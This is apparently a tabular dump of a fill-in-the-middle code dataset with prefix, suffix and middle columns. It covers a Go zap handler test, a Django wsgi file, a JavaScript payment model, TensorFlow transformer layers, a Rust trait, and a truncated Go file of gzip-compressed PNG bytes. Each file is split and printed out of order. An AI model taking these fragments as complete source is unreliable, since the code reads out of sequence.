file_name
stringlengths 3
137
| prefix
stringlengths 0
918k
| suffix
stringlengths 0
962k
| middle
stringlengths 0
812k
|
---|---|---|---|
http_handler_test.go | // Copyright (c) 2016 Uber Technologies, Inc.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
package zap_test
import (
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"net/http/httptest"
"strings"
"testing"
. "github.com/reddit/zap"
"github.com/reddit/zap/zapcore"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func newHandler() (AtomicLevel, *Logger) {
lvl := NewAtomicLevel()
logger := New(zapcore.NewNopCore())
return lvl, logger
}
func assertCodeOK(t testing.TB, code int) {
assert.Equal(t, http.StatusOK, code, "Unexpected response status code.")
}
func assertCodeBadRequest(t testing.TB, code int) {
assert.Equal(t, http.StatusBadRequest, code, "Unexpected response status code.")
}
func assertCodeMethodNotAllowed(t testing.TB, code int) {
assert.Equal(t, http.StatusMethodNotAllowed, code, "Unexpected response status code.")
}
func assertResponse(t testing.TB, expectedLevel zapcore.Level, actualBody string) {
assert.Equal(t, fmt.Sprintf(`{"level":"%s"}`, expectedLevel)+"\n", actualBody, "Unexpected response body.")
}
func assertJSONError(t testing.TB, body string) {
// Don't need to test exact error message, but one should be present.
var payload map[string]interface{}
require.NoError(t, json.Unmarshal([]byte(body), &payload), "Expected error response to be JSON.")
msg, ok := payload["error"]
require.True(t, ok, "Error message is an unexpected type.")
assert.NotEqual(t, "", msg, "Expected an error message in response.")
}
func makeRequest(t testing.TB, method string, handler http.Handler, reader io.Reader) (int, string) {
ts := httptest.NewServer(handler)
defer ts.Close()
req, err := http.NewRequest(method, ts.URL, reader)
require.NoError(t, err, "Error constructing %s request.", method)
res, err := http.DefaultClient.Do(req)
require.NoError(t, err, "Error making %s request.", method)
defer res.Body.Close()
body, err := ioutil.ReadAll(res.Body)
require.NoError(t, err, "Error reading request body.")
return res.StatusCode, string(body)
}
func TestHTTPHandlerGetLevel(t *testing.T) {
lvl, _ := newHandler()
code, body := makeRequest(t, "GET", lvl, nil)
assertCodeOK(t, code)
assertResponse(t, lvl.Level(), body)
}
func TestHTTPHandlerPutLevel(t *testing.T) {
lvl, _ := newHandler()
code, body := makeRequest(t, "PUT", lvl, strings.NewReader(`{"level":"warn"}`))
assertCodeOK(t, code)
assertResponse(t, lvl.Level(), body)
}
func TestHTTPHandlerPutUnrecognizedLevel(t *testing.T) |
func TestHTTPHandlerNotJSON(t *testing.T) {
lvl, _ := newHandler()
code, body := makeRequest(t, "PUT", lvl, strings.NewReader(`{`))
assertCodeBadRequest(t, code)
assertJSONError(t, body)
}
func TestHTTPHandlerNoLevelSpecified(t *testing.T) {
lvl, _ := newHandler()
code, body := makeRequest(t, "PUT", lvl, strings.NewReader(`{}`))
assertCodeBadRequest(t, code)
assertJSONError(t, body)
}
func TestHTTPHandlerMethodNotAllowed(t *testing.T) {
lvl, _ := newHandler()
code, body := makeRequest(t, "POST", lvl, strings.NewReader(`{`))
assertCodeMethodNotAllowed(t, code)
assertJSONError(t, body)
}
| {
lvl, _ := newHandler()
code, body := makeRequest(t, "PUT", lvl, strings.NewReader(`{"level":"unrecognized-level"}`))
assertCodeBadRequest(t, code)
assertJSONError(t, body)
} |
wsgi.py | """
WSGI config for seedstars_contacts project.
It exposes the WSGI callable as a module-level variable named ``application``. | """
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "seedstars_contacts.settings")
application = get_wsgi_application() |
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/ |
GetDebitCardTransactionResponse.js | /**
* PagarmeCoreApiLib
*
* This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
*/
'use strict';
const GetTransactionResponse = require('./GetTransactionResponse');
/**
* Creates an instance of GetDebitCardTransactionResponse
*/
class GetDebitCardTransactionResponse extends GetTransactionResponse {
/**
* @constructor
* @param {Object} obj The object passed to constructor
*/
constructor(obj) {
super(obj);
if (obj === undefined || obj === null) return;
this.statementDescriptor =
this.constructor.getValue(obj.statementDescriptor
|| obj.statement_descriptor);
this.acquirerName = this.constructor.getValue(obj.acquirerName || obj.acquirer_name);
this.acquirerAffiliationCode =
this.constructor.getValue(obj.acquirerAffiliationCode
|| obj.acquirer_affiliation_code);
this.acquirerTid = this.constructor.getValue(obj.acquirerTid || obj.acquirer_tid);
this.acquirerNsu = this.constructor.getValue(obj.acquirerNsu || obj.acquirer_nsu);
this.acquirerAuthCode = | || obj.acquirer_auth_code);
this.operationType = this.constructor.getValue(obj.operationType || obj.operation_type);
this.card = this.constructor.getValue(obj.card);
this.acquirerMessage =
this.constructor.getValue(obj.acquirerMessage
|| obj.acquirer_message);
this.acquirerReturnCode =
this.constructor.getValue(obj.acquirerReturnCode
|| obj.acquirer_return_code);
this.mpi = this.constructor.getValue(obj.mpi);
this.eci = this.constructor.getValue(obj.eci);
this.authenticationType =
this.constructor.getValue(obj.authenticationType
|| obj.authentication_type);
this.threedAuthenticationUrl =
this.constructor.getValue(obj.threedAuthenticationUrl
|| obj.threed_authentication_url);
}
/**
* Function containing information about the fields of this model
* @return {array} Array of objects containing information about the fields
*/
static mappingInfo() {
return super.mappingInfo().concat([
{ name: 'statementDescriptor', realName: 'statement_descriptor' },
{ name: 'acquirerName', realName: 'acquirer_name' },
{ name: 'acquirerAffiliationCode', realName: 'acquirer_affiliation_code' },
{ name: 'acquirerTid', realName: 'acquirer_tid' },
{ name: 'acquirerNsu', realName: 'acquirer_nsu' },
{ name: 'acquirerAuthCode', realName: 'acquirer_auth_code' },
{ name: 'operationType', realName: 'operation_type' },
{ name: 'card', realName: 'card', type: 'GetCardResponse' },
{ name: 'acquirerMessage', realName: 'acquirer_message' },
{ name: 'acquirerReturnCode', realName: 'acquirer_return_code' },
{ name: 'mpi', realName: 'mpi' },
{ name: 'eci', realName: 'eci' },
{ name: 'authenticationType', realName: 'authentication_type' },
{ name: 'threedAuthenticationUrl', realName: 'threed_authentication_url' },
]);
}
/**
* Function containing information about discriminator values
* mapped with their corresponding model class names
*
* @return {object} Object containing Key-Value pairs mapping discriminator
* values with their corresponding model classes
*/
static discriminatorMap() {
return {
debit_card: 'GetDebitCardTransactionResponse',
};
}
}
module.exports = GetDebitCardTransactionResponse; | this.constructor.getValue(obj.acquirerAuthCode |
modules.py | # -*- coding: utf-8 -*-
#/usr/bin/python2
'''
June 2017 by kyubyong park.
[email protected].
https://www.github.com/kyubyong/transformer
'''
from __future__ import print_function
import tensorflow as tf
import numpy as np
def normalize(inputs,
epsilon = 1e-8,
scope="ln",
reuse=None):
'''Applies layer normalization.
Args:
inputs: A tensor with 2 or more dimensions, where the first dimension has
`batch_size`.
epsilon: A floating number. A very small number for preventing ZeroDivision Error.
scope: Optional scope for `variable_scope`.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Returns:
A tensor with the same shape and data dtype as `inputs`.
'''
with tf.variable_scope(scope, reuse=reuse):
inputs_shape = inputs.get_shape()
params_shape = inputs_shape[-1:]
# Tensor("encoder/num_blocks_0/multihead_attention/ln/moments/mean:0", shape=(32, 10, 1), dtype=float32)
mean, variance = tf.nn.moments(inputs, [-1], keep_dims=True)
beta= tf.Variable(tf.zeros(params_shape))
gamma = tf.Variable(tf.ones(params_shape))
normalized = (inputs - mean) / ( (variance + epsilon) ** (.5) )
outputs = gamma * normalized + beta
return outputs
def embedding(inputs,
vocab_size,
num_units,
zero_pad=True,
scale=True,
scope="embedding",
reuse=None):
'''Embeds a given tensor.
data_load 之后产生的x,y的大小
x,y的shape为[N,T],N即batch_size的大小,T为最大句子长度maxlen,默认为10。
这个之后应该是再加一个hidden_size (num_units)
Args:
inputs: A `Tensor` with type `int32` or `int64` containing the ids
to be looked up in `lookup table`.
vocab_size: An int. Vocabulary size.
num_units: An int. Number of embedding hidden units.
zero_pad: A boolean. If True, all the values of the fist row (id 0)
should be constant zeros.
scale: A boolean. If True. the outputs is multiplied by sqrt num_units.
scope: Optional scope for `variable_scope`.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Returns:
A `Tensor` with one more rank than inputs's. The last dimensionality
should be `num_units`.
For example,
```
import tensorflow as tf
inputs = tf.to_int32(tf.reshape(tf.range(2*3), (2, 3)))
outputs = embedding(inputs, 6, 2, zero_pad=True)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
print sess.run(outputs)
>>
[[[ 0. 0. ]
[ 0.09754146 0.67385566]
[ 0.37864095 -0.35689294]]
[[-1.01329422 -1.09939694]
[ 0.7521342 0.38203377]
[-0.04973143 -0.06210355]]]
```
```
import tensorflow as tf
inputs = tf.to_int32(tf.reshape(tf.range(2*3), (2, 3)))
outputs = embedding(inputs, 6, 2, zero_pad=False)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
print sess.run(outputs)
>>
[[[-0.19172323 -0.39159766]
[-0.43212751 -0.66207761]
[ 1.03452027 -0.26704335]]
[[-0.11634696 -0.35983452]
[ 0.50208133 0.53509563]
[ 1.22204471 -0.96587461]]]
```
'''
with tf.variable_scope(scope, reuse=reuse):
lookup_table = tf.get_variable('lookup_table',
dtype=tf.float32,
shape=[vocab_size, num_units],
initializer=tf.contrib.layers.xavier_initializer())
if zero_pad:
lookup_table = tf.concat((tf.zeros(shape=[1, num_units]),
lookup_table[1:, :]), 0)
# todo: embedding_lookup
outputs = tf.nn.embedding_lookup(lookup_table, inputs)
if scale:
outputs = outputs * (num_units ** 0.5)
return outputs
def positional_encoding(inputs,
num_units,
zero_pad=True,
scale=True,
scope="positional_encoding",
reuse=None):
'''Sinusoidal Positional_Encoding.
Equivalent to adding a constant matrix each time
Args:
inputs: A 2d Tensor with shape of (N, T).
num_units: Output dimensionality
zero_pad: Boolean. If True, all the values of the first row (id = 0) should be constant zero
scale: Boolean. If True, the output will be multiplied by sqrt num_units(check details from paper)
scope: Optional scope for `variable_scope`.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Returns:
A 'Tensor' with one more rank than inputs's, with the dimensionality should be 'num_units'
'''
N, T = inputs.get_shape().as_list()
with tf.variable_scope(scope, reuse=reuse):
# [1,T] [[0, 1, 2, ..., T]] -> [N, T]
position_ind = tf.tile(tf.expand_dims(tf.range(T), 0), [N, 1])
# First part of the PE function: sin and cos argument
# [T, num_units] sin(pos/10000^(2i/dmodel) )
position_enc = np.array([
[pos / np.power(10000, 2.*i/num_units) for i in range(num_units)]
for pos in range(T)])
# Second part, apply the cosine to even columns and sin to odds. 奇数偶数
position_enc[:, 0::2] = np.sin(position_enc[:, 0::2]) # dim 2i
position_enc[:, 1::2] = np.cos(position_enc[:, 1::2]) # dim 2i+1
# Convert to a tensor
lookup_table = tf.convert_to_tensor(position_enc)
if zero_pad:
lookup_table = tf.concat((tf.zeros(shape=[1, num_units]),
lookup_table[1:, :]), 0)
outputs = tf.nn.embedding_lookup(lookup_table, position_ind)
if scale:
outputs = outputs * num_units**0.5
return outputs
def multihead_attention(queries,
keys,
num_units=None,
num_heads=8,
dropout_rate=0,
is_training=True,
causality=False,
scope="multihead_attention",
reuse=None):
'''Applies multihead attention.
data_load 输出
x,y的shape为[N,T],N即batch_size的大小,T为最大句子长度maxlen,默认为10。
Form libei
Input Embedding: Batch * Length * Hidden
Posional Encoding : Length * Hidden
Encoder Input = Input Embedding + Posional Encoding
Query,Key,Value = Conv(Encoder Input,Hidden,3*Hidden)
Query = SplitHeads(Query)
Key = SplitHeads(Key)
Value = SplitHeads(Value)
Shape (Batch,Length,Heads,Channels)
Args:
queries: A 3d tensor with shape of [N, T_q, C_q].
keys: A 3d tensor with shape of [N, T_k, C_k].
num_units: A scalar. Attention size.
dropout_rate: A floating point number.
is_training: Boolean. Controller of mechanism for dropout.
causality: Boolean. If true, units that reference the future are masked.
num_heads: An int. Number of heads.
scope: Optional scope for `variable_scope`.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Returns
A 3d tensor with shape of (N, T_q, C)
'''
with tf.variable_scope(scope, reuse=reuse):
# Set the fall back option for num_units
if num_units is None:
num_units = queries.get_shape().as_list[-1]
# Linear projections Q、K、V 使用不同的矩阵进行映射学习
# 新版代码使用一个大矩阵然后split为三份
# self attention 在 encoder-decoder attention时候Q来自encoder K、V来自decoder; encoder或decoder时候 Q、K、V一样
Q = tf.layers.dense(queries, num_units, activation=tf.nn.relu) # (N, T_q, C)
K = tf.layers.dense(keys, num_units, activation=tf.nn.relu) # (N, T_k, C)
V = tf.layers.dense(keys, num_units, activation=tf.nn.relu) # (N, T_k, C)
# Split and concat
# 分为8头
Q_ = tf.concat(tf.split(Q, num_heads, axis=2), axis=0) # (h*N, T_q, C/h)
K_ = tf.concat(tf.split(K, num_heads, axis=2), axis=0) # (h*N, T_k, C/h)
V_ = tf.concat(tf.split(V, num_heads, axis=2), axis=0) # (h*N, T_k, C/h)
# Multiplication (h*batch,length_q,length_k)
outputs = tf.matmul(Q_, tf.transpose(K_, [0, 2, 1])) # (h*N, T_q, T_k)
# Scale
outputs = outputs / (K_.get_shape().as_list()[-1] ** 0.5)
# Key Masking
# N, T padding 0
key_masks = tf.sign(tf.abs(tf.reduce_sum(keys, axis=-1))) # (N, T_k)
key_masks = tf.tile(key_masks, [num_heads, 1]) # (h*N, T_k)
key_masks = tf.tile(tf.expand_dims(key_masks, 1), [1, tf.shape(queries)[1], 1]) # (h*N, T_q, T_k)
# tf.expand_dims(input, dim, name=None) add 1 at dim
paddings = tf.ones_like(outputs)*(-2**32+1)
outputs = tf.where(tf.equal(key_masks, 0), paddings, outputs) # (h*N, T_q, T_k)
# Causality = Future blinding
if causality:
diag_vals = tf.ones_like(outputs[0, :, :]) # (T_q, T_k)
tril = tf.contrib.linalg.LinearOperatorTriL(diag_vals).to_dense() # (T_q, T_k) triangular matrix
masks = tf.tile(tf.expand_dims(tril, 0), [tf.shape(outputs)[0], 1, 1]) # (h*N, T_q, T_k)
paddings = tf.ones_like(masks)*(-2**32+1)
outputs = tf.where(tf.equal(masks, 0), paddings, outputs) # (h*N, T_q, T_k)
# Activation
outputs = tf.nn.softmax(outputs) # (h*N, T_q, T_k)
# Query Masking
query_masks = tf.sign(tf.abs(tf.reduce_sum(queries, axis=-1))) # (N, T_q)
query_masks = tf.tile(query_masks, [num_heads, 1]) # (h*N, T_q)
query_masks = tf.tile(tf.expand_dims(query_masks, -1), [1, 1, tf.shape(keys)[1]]) # (h*N, T_q, T_k)
outputs *= query_masks # broadcasting. (N, T_q, C) should be (h*N, T_q, T_k)。
# Dropouts
outputs = tf.layers.dropout(outputs, rate=dropout_rate, training=tf.convert_to_tensor(is_training))
# Weighted sum
outputs = tf.matmul(outputs, V_) # ( h*N, T_q, C/h)
# 少了个线性变换
# Restore shape
outputs = tf.concat(tf.split(outputs, num_heads, axis=0), axis=2 ) # (N, T_q, C)
# Residual connection
outputs += queries
# Normalize
outputs = normalize(outputs) # (N, T_q, C)
return outputs
def feedforward(inputs,
num_units=[2048, 512],
scope="multihead_attention",
reuse=None):
'''Point-wise feed forward net.
Args:
inputs: A 3d tensor with shape of [N, T, C].
num_units: A list of two integers.
scope: Optional scope for `variable_scope`.
reuse: Boolean, whether to reuse the weights of a pre |
For example,
```
import tensorflow as tf
inputs = tf.convert_to_tensor([[[0, 0, 1],
[0, 1, 0],
[1, 0, 0]],
[[1, 0, 0],
[1, 0, 0],
[0, 1, 0]]], tf.float32)
outputs = label_smoothing(inputs)
with tf.Session() as sess:
print(sess.run([outputs]))
>>
[array([[[ 0.03333334, 0.03333334, 0.93333334],
[ 0.03333334, 0.93333334, 0.03333334],
[ 0.93333334, 0.03333334, 0.03333334]],
[[ 0.93333334, 0.03333334, 0.03333334],
[ 0.93333334, 0.03333334, 0.03333334],
[ 0.03333334, 0.93333334, 0.03333334]]], dtype=float32)]
```
'''
K = inputs.get_shape().as_list()[-1] # number of channels
return ((1-epsilon) * inputs) + (epsilon / K)
| vious layer
by the same name.
Returns:
A 3d tensor with the same shape and dtype as inputs
'''
with tf.variable_scope(scope, reuse=reuse):
# Inner layer
params = {"inputs": inputs, "filters": num_units[0], "kernel_size": 1,
"activation": tf.nn.relu, "use_bias": True}
outputs = tf.layers.conv1d(**params)
# Readout layer
params = {"inputs": outputs, "filters": num_units[1], "kernel_size": 1,
"activation": None, "use_bias": True}
outputs = tf.layers.conv1d(**params)
# Residual connection
outputs += inputs
# Normalize
outputs = normalize(outputs)
return outputs
def label_smoothing(inputs, epsilon=0.1):
'''Applies label smoothing. See https://arxiv.org/abs/1512.00567.
Args:
inputs: A 3d tensor with shape of [N, T, V], where V is the number of vocabulary.
epsilon: Smoothing rate.
|
treemeta.rs | // Copyright 2020 MaidSafe.net limited.
// | // https://opensource.org/licenses/BSD-3-Clause>, at your option. This file may not be copied,
// modified, or distributed except according to those terms. Please review the Licences for the
// specific language governing permissions and limitations relating to use of the SAFE Network
// Software.
/// `TreeMeta` represent the app-defined data that an application stores in each node
/// of the tree.
pub trait TreeMeta: Clone {}
impl<TM: Clone> TreeMeta for TM {} | // This SAFE Network Software is licensed to you under the MIT license <LICENSE-MIT
// http://opensource.org/licenses/MIT> or the Modified BSD license <LICENSE-BSD |
b0xfile_assets_openstack_operations_optimization_congress.png.go | // Code generaTed by fileb0x at "2020-09-25 22:38:51.170485 +0300 MSK m=+2.415579599" from config file "b0x.yml" DO NOT EDIT.
// modified(2020-09-25 20:02:04.092428015 +0300 MSK)
// original path: ../../assets/openstack/operations/optimization/congress.png
package assets
import (
"bytes"
"compress/gzip"
"io"
"os"
)
// FileAssetsOpenstackOperationsOptimizationCongressPng is "assets/openstack/operations/optimization/congress.png"
var FileAssetsOpenstackOperationsOptimizationCongressPng = []byte("\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\xcc\x96\xc5\x53\x1b\x8e\xf7\x68\x83\x53\x8a\xbb\x4b\xa1\x40\x71\x77\x77\xb7\x52\xdc\xdd\xdd\xdd\x29\xc5\x4a\x71\x2f\x50\xbc\x10\xdc\x5d\x8b\x4b\xe0\x13\x20\xb8\x5b\x20\x68\x70\xde\x7c\xff\x80\xb7\xff\xcd\x9d\xb3\x39\x77\x73\x36\x77\xe6\x26\x68\x69\x28\x62\x61\x90\x63\x00\x00\x00\x2c\x65\x25\x39\x1d\x00\x00\x01\xf0\x3f\xd0\x51\x01\x00\x80\x89\x57\x95\x1d\x00\x80\xff\x10\xa4\x6b\xe0\xa3\x63\xe9\x4f\xeb\xe1\xe5\x6e\xe7\xe8\x62\x4b\xeb\x13\xe8\x61\x4b\x6b\x1b\xe0\x68\x07\x00\x04\xac\x41\xf3\xc0\xbe\x6c\xc2\xbf\xe2\xb6\x2c\x47\xf3\x00\xc8\x36\x39\x48\x81\xb3\x01\x0d\x87\x97\x24\xff\x18\x02\xef\x7c\xe6\x66\xad\xcd\x05\x0c\x6d\xf4\x18\xe5\xbe\x9b\xff\x5e\x83\xbe\xbf\x82\x3d\xdf\x87\xfb\x0b\x7e\xf8\x7f\x01\xeb\xb5\x10\xce\xf5\xff\x51\x2e\xbf\x51\xbd\x99\xeb\x3f\xe2\x7f\xf0\x09\x0f\x7b\xf9\x78\x39\x77\x59\xdf\x3d\x67\x1e\x0b\xfe\xe7\x1c\xb2\xc9\xfc\x1c\x5a\xe3\x2d\x1e\x2e\xae\x05\x0a\x0e\x0d\x09\xdf\x58\x7e\x7c\xf9\x04\xa5\x3a\xb6\xb6\x0b\x34\x2b\x9d\x71\xe9\xef\x87\xb7\xfa\xff\x66\x9e\xbb\x83\xbd\x41\x6f\x43\xeb\x2b\xdd\xdb\x6e\xc2\xa6\x5e\xd6\xc7\x78\xef\x71\xc2\x2b\x55\xb8\xf4\xec\x7a\x98\x35\xfc\x30\x17\x6e\x9a\x57\xd9\xae\x1e\x2f\x42\x48\xc2\x54\xfe\xae\x13\x5a\x1d\xc2\x43\x80\xaa\x49\xfd\x29\x85\xcf\xa6\xb0\x30\x12\xd1\xad\xad\xb3\xab\x67\x2d\x21\xf3\x4d\x8a\x49\x1c\xee\x20\x60\xfc\xcb\xf0\xdd\x83\x70\x72\x48\x7b\x29\x8c\xff\xc6\xdf\x7d\xe4\x0e\x6f\xac\xd8\xda\x7f\xd6\xe9\xe8\xdc\xde\x5f\x9c\xe8\xd3\xb7\xf5\xee\xea\xd4\xba\xf5\xad\x0e\x4f\xdc\x49\x26\xf2\x58\xe0\xa4\xff\x21\x3c\xa8\x3f\x03\x38\x46\xcc\xf4\x95\xbd\x49\xf8\x21\x8f\xc3\x01\xb7\x34\x54\x06\x83\xf5\xd6\x63\xa8\x0f\xc8\xab\x96\x95\x63\xf3\x71\x87\x38\xed\xcb\x95\x99\x73\x8c\xb9\xad\x82\xaa\x74\x13\xd0\xe3\x8f\x42\xf2\xd4\xa8\x02\x23\xa3\x61\xa2\x49\xd6\x5c\x6b\x8c\x28\x70\xf3\xd1\xce\x61\xba\x07\xd1\x5f\xc5\xa2\x61\x80\x40\x32\xb4\xd3\xdc\xf4\x45\xb3\x4f\x02\x4d\x64\x5c\x45\x10\x79\x4b\xc2\x7a\xb4\x6b\xc4\x29\xcf\xd6\xe0\xf0\x9c\xc9\x3f\x2d\xca\x63\x33\xe7\x90\x62\xeb\xf9\xa0\xaf\x9a\xe2\x5d\xdd\x8a\x9e\x6c\x5a\x70\x3a\x19\xcb\x4f\xb2\x88\x4e\x01\xdb\xbc\x95\xc8\xbd\x88\x1e\x6e\x5b\x5c\x10\xfe\x8b\xf2\x34\x08\x8d\x56\x6e\xba\xd0\x50\xed\xbb\xcd\x00\x09\x86\x68\xc6\x76\xad\x12\x56\xa4\x90\xc0\x35\xc8\xb0\x73\x84\x21\x1a\x33\xa6\xc0\x16\xc5\xff\x9f\x7a\x52\xec\x3e\x5f\x63\x67\x60\x45\x5c\x30\xd0\x26\x90\x03\x89\x9d\xe1\x13\x88\x2f\x73\xc9\xe1\x9c\x81\xf5\xb3\xd4\x77\x33\xe7\x25\xad\x39\x6e\xa6\x6c\x6f\x8e\xce\xc3\x2c\x7e\x38\xbe\x2a\x4b\x67\x86\x4e\xa2\xa5\x2e\xb0\xb1\x22\xcf\xb9\xba\xb5\xad\xa6\xb5\x7d\x45\x67\xaa\xae\x65\xcd\x08\xf4\xdf\x37\x3e\x44\x4b\xc3\x44\xbd\x4a\xf5\x6f\xc1\xf6\x8b\xb3\xf3\x85\x95\xa2\xfe\xb7\x12\x36\x23\x69\x0a\xd4\xb6\x4b\x0b\x71\x29\x12\x5f\x8a\x73\xed\x8a\x6c\xff\x5b\xad\x98\xed\xb3\x19\x95\x7f\x06\x36\xd5\x18\xbb\x9e\x9c\x8a\xba\xa8\x38\x56\x16\xfa\xaf\xfa\xb6\xd7\x75\xd3\x38\x41\x47\xd2\x35\x24\x0e\x96\x40\x29\x45\x6f\xb9\xad\x82\xb5\x5b\xf6\xec\x2f\x3f\x3b\x25\xed\xd9\x7b\x0c\x9b\x93\xca\x83\xcd\x5f\x27\xc9\xb3\x9d\x5f\x49\x3f\x91\x16\xd8\x4c\x91\x91\xa5\x13\xfe\x0b\x68\xc5\xd4\x9a\xb7\x12\xbe\x61\xff\xc3\x90\x25\x3c\x95\xab\x4f\xcb\x62\x47\xe7\x4c\x67\xec\xa5\xd7\x90\x94\x36\xd8\x12\xbd\x4f\x20\xe1\x0d\xcf\xec\x94\x3c\x9c\x39\xb8\x6d\xbf\x66\xec\x9f\x2a\x68\x5e\x7a\x15\xe4\x39\x62\xf3\x75\x3f\x0c\x9b\x85\x70\x36\xb5\x3d\xd9\x66\x04\x10\xd8\x98\x3a\x70\xdf\x5d\x01\x5c\xd6\x97\xca\xaf\x68\x02\x5e\x8a\xfb\xbb\xde\x2f\x01\xef\x98\xb7\x73\x52\x34\x48\xa3\xc2\xe3\x29\x8f\x2d\xdc\x5e\x92\x45\x2c\xf5\xb7\x17\x39\xac\xff\xdc\x72\xc1\x39\xe0\x85\x16\xfb\x84\xce\x59\x37\x60\x83\xc9\x0a\x84\x1e\x4e\xeb\xae\x52\x78\x11\x6f\x52\x0d\x3d\xb8\x49\x81\xff\x9a\xc3\x82\x39\xae\x69\xa6\xf0\xc9\x91\xdb\x57\xfa\x64\x8d\x34\x77\xce\x52\x55\x1e\x5b\x88\x81\x50\x2d\x05\x0f\x16\x7f\x5f\x99\x98\xde\xdb\x61\xdc\xa5\x60\x56\x11\x32\xbb\xa9\xee\xcc\x8d\xad\x84\xac\xde\xb9\x09\x7a\x8f\xa6\x6a\x41\xdd\x73\x6c\xc1\x44\x76\x22\x3c\x16\x39\x3a\xd9\xaa\x95\x47\xd3\x3d\x6f\xf5\x68\x06\xbb\x9f\xfd\x9f\xfc\x63\x6c\x1b\x98\xb7\x38\x1f\x4d\xb9\x4e\x65\x82\x0f\xa9\x06\x7e\x2f\x9e\xf4\x09\xfd\x36\xdc\x73\x6b\x52\xe9\x61\x25\x73\x3d\x40\xd8\xd5\xc5\x0d\xae\x6c\xf3\x37\x4a\xc0\x62\x8b\xc0\x57\xb3\x70\xed\x69\x5e\xa3\xae\xbd\xc8\x39\x55\xab\x56\x1b\xca\xff\x25\xda\xfc\xf7\xd3\x5f\xeb\x7f\x2a\xa1\x05\xf3\xa4\x1c\xc7\x6c\xc1\x44\xc4\xae\x69\x96\xd8\xd5\x9a\x80\x27\x54\x0d\x7d\x36\xc5\x49\x32\x23\x81\xed\x5f\x0b\x5f\xec\xdd\xc0\xfe\x35\xa2\x05\xdc\x01\xf6\xf4\x0e\x2f\x27\xdd\x0d\x35\x02\xf8\x42\x79\x2e\x36\x43\xbc\xb7\xb8\x3b\x69\x0c\x1c\xbf\x93\x02\xb3\x1d\x18\x41\x6f\x2d\x1b\x1a\x46\x07\x1d\x43\xad\xdf\xa2\x5c\x3f\x22\x5e\x5c\x3d\x2c\x9f\xe5\x02\xac\xad\x9b\x83\xa3\xfd\x43\xef\x17\x65\x2c\xe7\x45\x18\xb9\x2f\xa3\x11\x27\x3c\xed\xef\x64\xe9\xf6\xab\x7d\x13\x8d\x93\x26\x42\x9b\xc7\x79\xb0\xd7\xca\x9a\x6c\x8a\xf1\xa3\xe5\xbb\x5d\x11\x1b\x9a\x4f\xb3\xf8\x8d\x4c\xf3\x4f\x78\x6a\xb1\x74\x17\x35\xac\x75\x7d\x88\x7f\x43\xcb\x69\xf6\x1b\xe3\x76\x33\x6d\x67\x3c\x22\xae\x17\x55\x3f\xa1\xb3\x8e\xd9\x49\x17\x2f\x29\xcb\x47\x53\x61\xe9\x3a\xa6\x66\xe9\xf6\x4f\xbc\x7d\x20\x5b\xbf\xf3\xbe\x73\xf4\x6a\xea\x0a\x4c\x17\xf6\xee\x6b\x0f\x38\x6d\xb8\x0b\xf6\x66\xb5\x19\xb4\x9a\xa6\x76\xd9\x0b\x9d\x47\x66\xb2\x6d\xf4\xaf\xa5\xa5\x65\x35\xda\xf0\x37\xf5\x1d\x13\xd8\x40\x7c\xfd\x72\x07\x2a\x11\xdf\x2f\x9d\xa9\xf9\xec\x82\x4f\xc0\x43\xa8\x80\xc7\x38\xf4\x57\x4f\x5a\xd1\xfd\xc2\xe8\x92\xd5\x30\x47\x64\xa1\x1e\x49\x5b\x76\x59\x76\xb5\x05\x97\xc7\xaf\x68\x5d\x60\xc9\x5f\x03\x5f\x77\x32\xe0\x3f\xf0\x76\xb1\xaf\x53\x6a\x74\x93\x4a\x45\x4c\x2a\xa7\x2a\x7d\x52\x14\xba\x15\x48\x58\x9b\x3d\x9a\x48\xee\xc8\x5f\x5d\xa9\x1e\xc4\x08\xe5\x0a\xb1\x2d\x6f\xd4\xcb\x7a\xb4\xd3\x11\xcf\x54\x08\x74\x17\x9a\xb4\x89\x6f\xc4\x6e\xec\xc6\x92\xdf\xf8\x70\xa5\x1c\x5d\xe3\x65\x3d\xb2\x72\xd6\x85\x25\x53\xdc\xf4\xa1\x66\xf2\x5c\x35\xea\x33\xfc\xfa\x64\x1e\xed\x5b\x1d\xde\x6f\x1d\x96\xfd\x81\xff\xd4\x57\x33\x0d\x4c\x8f\xea\x42\x57\x9a\x4c\xc9\x0f\xa0\xf7\xc4\x2e\x73\x3d\x14\x8b\x64\xb5\xfe\xb5\xea\x5d\xef\x63\xb6\x8b\xcc\x6b\x77\x6a\xaa\xd9\x5b\x3e\x98\xaa\x95\x0b\x32\x9b\x09\x4a\x97\xbc\x94\x9a\x4d\x17\x08\xe5\xe3\x62\xc1\x22\xb6\x5a\x3d\xd6\x73\x0b\x46\x8d\xb9\xfa\x06\xd5\x83\x7b\xa1\xea\x41\x89\x1a\x59\x68\xe1\x61\x31\x34\xf0\x58\xc9\xa5\xc6\x48\x65\x51\x5a\xad\x66\x8a\x3a\xf4\x15\x1b\x01\xc7\x16\xa7\x1c\x40\x5a\xff\xe8\x